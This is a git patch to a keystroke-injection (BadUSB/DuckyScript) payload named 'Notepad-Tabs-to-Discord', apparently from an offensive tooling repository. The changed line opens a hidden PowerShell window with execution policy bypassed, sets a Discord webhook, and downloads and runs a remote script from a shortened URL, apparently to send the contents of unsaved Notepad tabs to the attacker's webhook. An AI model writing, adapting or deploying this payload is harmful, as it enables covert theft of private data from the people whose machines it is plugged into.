From 5865e662dff1e11f5397322392933dd76d9a1e9c Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 29 Feb 2024 12:11:01 +0000 Subject: [PATCH] Update Notepad-Tabs-to-Discord.txt --- Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt b/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt index abc5422..639f7b7 100644 --- a/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt +++ b/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_nptabs_to_dc | iex ENTER